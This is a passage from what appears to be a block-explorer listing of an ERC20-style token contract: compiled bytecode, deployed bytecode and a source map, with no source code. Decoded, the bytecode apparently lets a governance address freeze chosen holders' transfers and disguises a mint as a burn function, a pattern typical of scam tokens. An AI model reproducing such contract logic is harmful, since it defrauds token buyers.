9050565b60006116ed602883611a0c565b91506116f882611d2c565b604082019050919050565b6000611710602083611a0c565b915061171b82611d7b565b602082019050919050565b6000611733602183611a0c565b915061173e82611da4565b604082019050919050565b6000611756602583611a0c565b915061176182611df3565b604082019050919050565b6000611779602483611a0c565b915061178482611e42565b604082019050919050565b600061179c602783611a0c565b91506117a782611e91565b604082019050919050565b60006117bf602583611a0c565b91506117ca82611ee0565b604082019050919050565b6117de81611ab1565b82525050565b6117ed81611abb565b82525050565b600060208201905061180860008301846115da565b92915050565b600060208201905061182360008301846115e9565b92915050565b6000602082019050818103600083015261184381846115f8565b905092915050565b6000602082019050818103600083015261186481611631565b9050919050565b6000602082019050818103600083015261188481611654565b9050919050565b600060208201905081810360008301526118a481611677565b9050919050565b600060208201905081810360008301526118c48161169a565b9050919050565b600060208201905081810360008301526118e4816116bd565b9050919050565b60006020820190508181036000830152611904816116e0565b9050919050565b6000602082019050818103600083015261192481611703565b9050919050565b6000602082019050818103600083015261194481611726565b9050919050565b6000602082019050818103600083015261196481611749565b9050919050565b600060208201905081810360008301526119848161176c565b9050919050565b600060208201905081810360008301526119a48161178f565b9050919050565b600060208201905081810360008301526119c4816117b2565b9050919050565b60006020820190506119e060008301846117d5565b92915050565b60006020820190506119fb60008301846117e4565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a2882611ab1565b9150611a3383611ab1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6857611a67611b2d565b5b828201905092915050565b6000611a7e82611a91565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611ae6578082015181840152602081019050611acb565b83811115611af5576000848401525b50505050565b60006002820490506001821680611b1357607f821691505b60208210811415611b2757611b26611b5c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f476f7665726e616e63653a2063616c6c6572206973206e6f742074686520676f60008201527f7665726e616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f7574206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611f3881611a73565b8114611f4357600080fd5b50565b611f4f81611ab1565b8114611f5a57600080fd5b5056fea2646970667358221220c01b5652bbbfa726584c00437e305cc4d35b8614abb45194c5697e21a119df9e64736f6c63430008050033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806339d0534a116100a25780638da5cb5b116100715780638da5cb5b146102b857806395d89b41146102d6578063a457c2d7146102f4578063a9059cbb14610324578063dd62ed3e146103545761010b565b806339d0534a1461024657806342966c681461026257806370a082311461027e578063715018a6146102ae5761010b565b806323b872dd116100de57806323b872dd146101985780632b603c71146101c8578063313ce567146101f857806339509351146102165761010b565b806306fdde031461011057806307980cb91461012e578063095ea7b31461014a57806318160ddd1461017a575b600080fd5b610118610384565b6040516101259190611829565b60405180910390f35b610148600480360381019061014391906114ad565b610416565b005b610164600480360381019061015f919061156d565b610531565b604051610171919061180e565b60405180910390f35b61018261054f565b60405161018f91906119cb565b60405180910390f35b6101b260048036038101906101ad919061151a565b610559565b6040516101bf919061180e565b60405180910390f35b6101e260048036038101906101dd91906114ad565b610651565b6040516101ef919061180e565b60405180910390f35b6102006106a7565b60405161020d91906119e6565b60405180910390f35b610230600480360381019061022b919061156d565b6106b0565b60405161023d919061180e565b60405180910390f35b610260600480360381019061025b91906114ad565b61075c565b005b61027c600480360381019061027791906115ad565b610905565b005b610298600480360381019061029391906114ad565b6109b0565b6040516102a591906119cb565b60405180910390f35b6102b66109f9565b005b6102c0610a81565b6040516102cd91906117f3565b60405180910390f35b6102de610aaa565b6040516102eb9190611829565b60405180910390f35b61030e6004803603810190610309919061156d565b610b3c565b60405161031b919061180e565b60405180910390f35b61033e6004803603810190610339919061156d565b610c27565b60405161034b919061180e565b60405180910390f35b61036e600480360381019061036991906114da565b610c45565b60405161037b91906119cb565b60405180910390f35b60606006805461039390611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611afb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b61041e610ccc565b73ffffffffffffffffffffffffffffffffffffffff1661043c610a81565b73ffffffffffffffffffffffffffffffffffffffff1614610492576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104899061190b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104ed57600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600061054561053e610ccc565b8484610cd4565b6001905092915050565b6000600554905090565b6000610566848484610e9f565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105b1610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610631576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610628906118eb565b60405180910390fd5b6106458561063d610ccc565b858403610cd4565b60019150509392505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006009905090565b60006107526106bd610ccc565b8484600460006106cb610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461074d9190611a1d565b610cd4565b6001905092915050565b610764610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ea906118ab565b60405180910390fd5b60011515600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514156108a9576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610902565b6001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b61090d610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461099c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610993906118ab565b60405180910390fd5b6109ad6109a7610ccc565b8261120d565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a01610ccc565b73ffffffffffffffffffffffffffffffffffffffff16610a1f610a81565b73ffffffffffffffffffffffffffffffffffffffff1614610a75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6c9061190b565b60405180910390fd5b610a7f60006113b5565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610ab990611afb565b80601f0160208091040260200160405190810160405280929190818152602001828054610ae590611afb565b8015610b325780601f10610b0757610100808354040283529160200191610b32565b820191906000526020600020905b815481529060010190602001808311610b1557829003601f168201915b5050505050905090565b60008060046000610b4b610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff906119ab565b60405180910390fd5b610c1c610c13610ccc565b85858403610cd4565b600191505092915050565b6000610c3b610c34610ccc565b8484610e9f565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3b9061196b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab9061188b565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e9291906119cb565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f069061194b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f769061184b565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806110205750600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110695760008114611068576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105f9061198b565b60405180910390fd5b5b611074838383611479565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f2906118cb565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111909190611a1d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111f491906119cb565b60405180910390a361120784848461147e565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561127d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112749061192b565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611304576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112fb9061186b565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113a891906119cb565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b60008135905061149281611f2f565b92915050565b6000813590506114a781611f46565b92915050565b6000602082840312156114c3576114c2611b8b565b5b60006114d184828501611483565b91505092915050565b600080604083850312156114f1576114f0611b8b565b5b60006114ff85828601611483565b925050602061151085828601611483565b9150509250929050565b60008060006060848603121561153357611532611b8b565b5b600061154186828701611483565b935050602061155286828701611483565b925050604061156386828701611498565b9150509250925092565b6000806040838503121561158457611583611b8b565b5b600061159285828601611483565b92505060206115a385828601611498565b9150509250929050565b6000602082840312156115c3576115c2611b8b565b5b60006115d184828501611498565b91505092915050565b6115e381611a73565b82525050565b6115f281611a85565b82525050565b600061160382611a01565b61160d8185611a0c565b935061161d818560208601611ac8565b61162681611b90565b840191505092915050565b600061163e602383611a0c565b915061164982611ba1565b604082019050919050565b6000611661602283611a0c565b915061166c82611bf0565b604082019050919050565b6000611684602283611a0c565b915061168f82611c3f565b604082019050919050565b60006116a7602883611a0c565b91506116b282611c8e565b604082019050919050565b60006116ca602683611a0c565b91506116d582611cdd565b604082019050919050565b60006116ed602883611a0c565b91506116f882611d2c565b604082019050919050565b6000611710602083611a0c565b915061171b82611d7b565b602082019050919050565b6000611733602183611a0c565b915061173e82611da4565b604082019050919050565b6000611756602583611a0c565b915061176182611df3565b604082019050919050565b6000611779602483611a0c565b915061178482611e42565b604082019050919050565b600061179c602783611a0c565b91506117a782611e91565b604082019050919050565b60006117bf602583611a0c565b91506117ca82611ee0565b604082019050919050565b6117de81611ab1565b82525050565b6117ed81611abb565b82525050565b600060208201905061180860008301846115da565b92915050565b600060208201905061182360008301846115e9565b92915050565b6000602082019050818103600083015261184381846115f8565b905092915050565b6000602082019050818103600083015261186481611631565b9050919050565b6000602082019050818103600083015261188481611654565b9050919050565b600060208201905081810360008301526118a481611677565b9050919050565b600060208201905081810360008301526118c48161169a565b9050919050565b600060208201905081810360008301526118e4816116bd565b9050919050565b60006020820190508181036000830152611904816116e0565b9050919050565b6000602082019050818103600083015261192481611703565b9050919050565b6000602082019050818103600083015261194481611726565b9050919050565b6000602082019050818103600083015261196481611749565b9050919050565b600060208201905081810360008301526119848161176c565b9050919050565b600060208201905081810360008301526119a48161178f565b9050919050565b600060208201905081810360008301526119c4816117b2565b9050919050565b60006020820190506119e060008301846117d5565b92915050565b60006020820190506119fb60008301846117e4565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a2882611ab1565b9150611a3383611ab1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6857611a67611b2d565b5b828201905092915050565b6000611a7e82611a91565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611ae6578082015181840152602081019050611acb565b83811115611af5576000848401525b50505050565b60006002820490506001821680611b1357607f821691505b60208210811415611b2757611b26611b5c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f476f7665726e616e63653a2063616c6c6572206973206e6f742074686520676f60008201527f7665726e616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f7574206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611f3881611a73565b8114611f4357600080fd5b50565b611f4f81611ab1565b8114611f5a57600080fd5b5056fea2646970667358221220c01b5652bbbfa726584c00437e305cc4d35b8614abb45194c5697e21a119df9e64736f6c63430008050033

Deployed Bytecode Sourcemap

18240:338:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8428:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5684:146;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11221:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9547:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11872:492;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10141:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9390:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12773:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9862:178;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10754:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9718:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6181:103;;;:::i;:::-;;5079:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8647:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13491:413;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10463:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10923:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8428:100;8482:13;8515:5;8508:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8428:100;:::o;5684:146::-;5310:12;:10;:12::i;:::-;5299:23;;:7;:5;:7::i;:::-;:23;;;5291:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5787:1:::1;5764:25;;:11;;;;;;;;;;;:25;;;5755:35;;;::::0;::::1;;5815:7;5801:11;;:21;;;;;;;;;;;;;;;;;;5684:146:::0;:::o;11221:169::-;11304:4;11321:39;11330:12;:10;:12::i;:::-;11344:7;11353:6;11321:8;:39::i;:::-;11378:4;11371:11;;11221:169;;;;:::o;9547:108::-;9608:7;9635:12;;9628:19;;9547:108;:::o;11872:492::-;12012:4;12029:36;12039:6;12047:9;12058:6;12029:9;:36::i;:::-;12078:24;12105:11;:19;12117:6;12105:19;;;;;;;;;;;;;;;:33;12125:12;:10;:12::i;:::-;12105:33;;;;;;;;;;;;;;;;12078:60;;12177:6;12157:16;:26;;12149:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;12264:57;12273:6;12281:12;:10;:12::i;:::-;12314:6;12295:16;:25;12264:8;:57::i;:::-;12352:4;12345:11;;;11872:492;;;;;:::o;10141:109::-;10199:4;10223:10;:19;10234:7;10223:19;;;;;;;;;;;;;;;;;;;;;;;;;10216:26;;10141:109;;;:::o;9390:92::-;9448:5;9473:1;9466:8;;9390:92;:::o;12773:215::-;12861:4;12878:80;12887:12;:10;:12::i;:::-;12901:7;12947:10;12910:11;:25;12922:12;:10;:12::i;:::-;12910:25;;;;;;;;;;;;;;;:34;12936:7;12910:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;12878:8;:80::i;:::-;12976:4;12969:11;;12773:215;;;;:::o;9862:178::-;5542:12;:10;:12::i;:::-;5527:27;;:11;;;;;;;;;;;:27;;;5519:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;9961:4:::1;9938:27;;:10;:19;9949:7;9938:19;;;;;;;;;;;;;;;;;;;;;;;;;:27;;;9934:99;;;9990:5;9968:10;:19;9979:7;9968:19;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;9934:99;;;10026:4;10004:10;:19;10015:7;10004:19;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;9934:99;9862:178:::0;:::o;10754:106::-;5542:12;:10;:12::i;:::-;5527:27;;:11;;;;;;;;;;;:27;;;5519:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;10825:27:::1;10831:12;:10;:12::i;:::-;10845:6;10825:5;:27::i;:::-;10754:106:::0;:::o;9718:127::-;9792:7;9819:9;:18;9829:7;9819:18;;;;;;;;;;;;;;;;9812:25;;9718:127;;;:::o;6181:103::-;5310:12;:10;:12::i;:::-;5299:23;;:7;:5;:7::i;:::-;:23;;;5291:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6246:30:::1;6273:1;6246:18;:30::i;:::-;6181:103::o:0;5079:87::-;5125:7;5152:6;;;;;;;;;;;5145:13;;5079:87;:::o;8647:104::-;8703:13;8736:7;8729:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8647:104;:::o;13491:413::-;13584:4;13601:24;13628:11;:25;13640:12;:10;:12::i;:::-;13628:25;;;;;;;;;;;;;;;:34;13654:7;13628:34;;;;;;;;;;;;;;;;13601:61;;13701:15;13681:16;:35;;13673:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;13794:67;13803:12;:10;:12::i;:::-;13817:7;13845:15;13826:16;:34;13794:8;:67::i;:::-;13892:4;13885:11;;;13491:413;;;;:::o;10463:175::-;10549:4;10566:42;10576:12;:10;:12::i;:::-;10590:9;10601:6;10566:9;:42::i;:::-;10626:4;10619:11;;10463:175;;;;:::o;10923:151::-;11012:7;11039:11;:18;11051:5;11039:18;;;;;;;;;;;;;;;:27;11058:7;11039:27;;;;;;;;;;;;;;;;11032:34;;10923:151;;;;:::o;1371:98::-;1424:7;1451:10;1444:17;;1371:98;:::o;16483:380::-;16636:1;16619:19;;:5;:19;;;;16611:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16717:1;16698:21;;:7;:21;;;;16690:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16801:6;16771:11;:18;16783:5;16771:18;;;;;;;;;;;;;;;:27;16790:7;16771:27;;;;;;;;;;;;;;;:36;;;;16839:7;16823:32;;16832:5;16823:32;;;16848:6;16823:32;;;;;;:::i;:::-;;;;;;;;16483:380;;;:::o;14394:875::-;14552:1;14534:20;;:6;:20;;;;14526:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;14636:1;14615:23;;:9;:23;;;;14607:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14693:10;:18;14704:6;14693:18;;;;;;;;;;;;;;;;;;;;;;;;;:43;;;;14715:10;:21;14726:9;14715:21;;;;;;;;;;;;;;;;;;;;;;;;;14693:43;14689:123;;;14767:1;14757:6;:11;14748:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;14689:123;14833:47;14854:6;14862:9;14873:6;14833:20;:47::i;:::-;14893:21;14917:9;:17;14927:6;14917:17;;;;;;;;;;;;;;;;14893:41;;14970:6;14953:13;:23;;14945:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;15091:6;15075:13;:22;15055:9;:17;15065:6;15055:17;;;;;;;;;;;;;;;:42;;;;15143:6;15119:9;:20;15129:9;15119:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;15184:9;15167:35;;15176:6;15167:35;;;15195:6;15167:35;;;;;;:::i;:::-;;;;;;;;15215:46;15235:6;15243:9;15254:6;15215:19;:46::i;:::-;14515:754;14394:875;;;:::o;15602:443::-;15705:1;15686:21;;:7;:21;;;;15678:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15758:22;15783:9;:18;15793:7;15783:18;;;;;;;;;;;;;;;;15758:43;;15838:6;15820:14;:24;;15812:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;15957:6;15940:14;:23;15919:9;:18;15929:7;15919:18;;;;;;;;;;;;;;;:44;;;;16026:1;16000:37;;16009:7;16000:37;;;16030:6;16000:37;;;;;;:::i;:::-;;;;;;;;15667:378;15602:443;;:::o;6444:191::-;6518:16;6537:6;;;;;;;;;;;6518:25;;6563:8;6554:6;;:17;;;;;;;;;;;;;;;;;;6618:8;6587:40;;6608:8;6587:40;;;;;;;;;;;;6507:128;6444:191;:::o;17421:125::-;;;;:::o;18109:124::-;;;;:::o;7:139:1:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;198:5;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:329::-;356:6;405:2;393:9;384:7;380:23;376:32;373:2;;;411:79;;:::i;:::-;373:2;531:1;556:53;601:7;592:6;581:9;577:22;556:53;:::i;:::-;546:63;;502:117;363:263;;;;:::o;632:474::-;700:6;708;757:2;745:9;736:7;732:23;728:32;725:2;;;763:79;;:::i;:::-;725:2;883:1;908:53;953:7;944:6;933:9;929:22;908:53;:::i;:::-;898:63;;854:117;1010:2;1036:53;1081:7;1072:6;1061:9;1057:22;1036:53;:::i;:::-;1026:63;;981:118;715:391;;;;;:::o;1112:619::-;1189:6;1197;1205;1254:2;1242:9;1233:7;1229:23;1225:32;1222:2;;;1260:79;;:::i;:::-;1222:2;1380:1;1405:53;1450:7;1441:6;1430:9;1426:22;1405:53;:::i;:::-;1395:63;;1351:117;1507:2;1533:53;1578:7;1569:6;1558:9;1554:22;1533:53;:::i;:::-;1523:63;;1478:118;1635:2;1661:53;1706:7;1697:6;1686:9;1682:22;1661:53;:::i;:::-;1651:63;;1606:118;1212:519;;;;;:::o;1737:474::-;1805:6;1813;1862:2;1850:9;1841:7;1837:23;1833:32;1830:2;;;1868:79;;:::i;:::-;1830:2;1988:1;2013:53;2058:7;2049:6;2038:9;2034:22;2013:53;:::i;:::-;2003:63;;1959:117;2115:2;2141:53;2186:7;2177:6;2166:9;2162:22;2141:53;:::i;:::-;2131:63;;2086:118;1820:391;;;;;:::o;2217:329::-;2276:6;2325:2;2313:9;2304:7;2300:23;2296:32;2293:2;;;2331:79;;:::i;:::-;2293:2;2451:1;2476:53;2521:7;2512:6;2501:9;2497:22;2476:53;:::i;:::-;2466:63;;2422:117;2283:263;;;;:::o;2552:118::-;2639:24;2657:5;2639:24;:::i;:::-;2634:3;2627:37;2617:53;;:::o;2676:109::-;2757:21;2772:5;2757:21;:::i;:::-;2752:3;2745:34;2735:50;;:::o;2791:364::-;2879:3;2907:39;2940:5;2907:39;:::i;:::-;2962:71;3026:6;3021:3;2962:71;:::i;:::-;2955:78;;3042:52;3087:6;3082:3;3075:4;3068:5;3064:16;3042:52;:::i;:::-;3119:29;3141:6;3119:29;:::i;:::-;3114:3;3110:39;3103:46;;2883:272;;;;;:::o;3161:366::-;3303:3;3324:67;3388:2;3383:3;3324:67;:::i;:::-;3317:74;;3400:93;3489:3;3400:93;:::i;:::-;3518:2;3513:3;3509:12;3502:19;;3307:220;;;:::o;3533:366::-;3675:3;3696:67;3760:2;3755:3;3696:67;:::i;:::-;3689:74;;3772:93;3861:3;3772:93;:::i;:::-;3890:2;3885:3;3881:12;3874:19;;3679:220;;;:::o;3905:366::-;4047:3;4068:67;4132:2;4127:3;4068:67;:::i;:::-;4061:74;;4144:93;4233:3;4144:93;:::i;:::-;4262:2;4257:3;4253:12;4246:19;;4051:220;;;:::o;4277:366::-;4419:3;4440:67;4504:2;4499:3;4440:67;:::i;:::-;4433:74;;4516:93;4605:3;4516:93;:::i;:::-;4634:2;4629:3;4625:12;4618:19;;4423:220;;;:::o;4649:366::-;4791:3;4812:67;4876: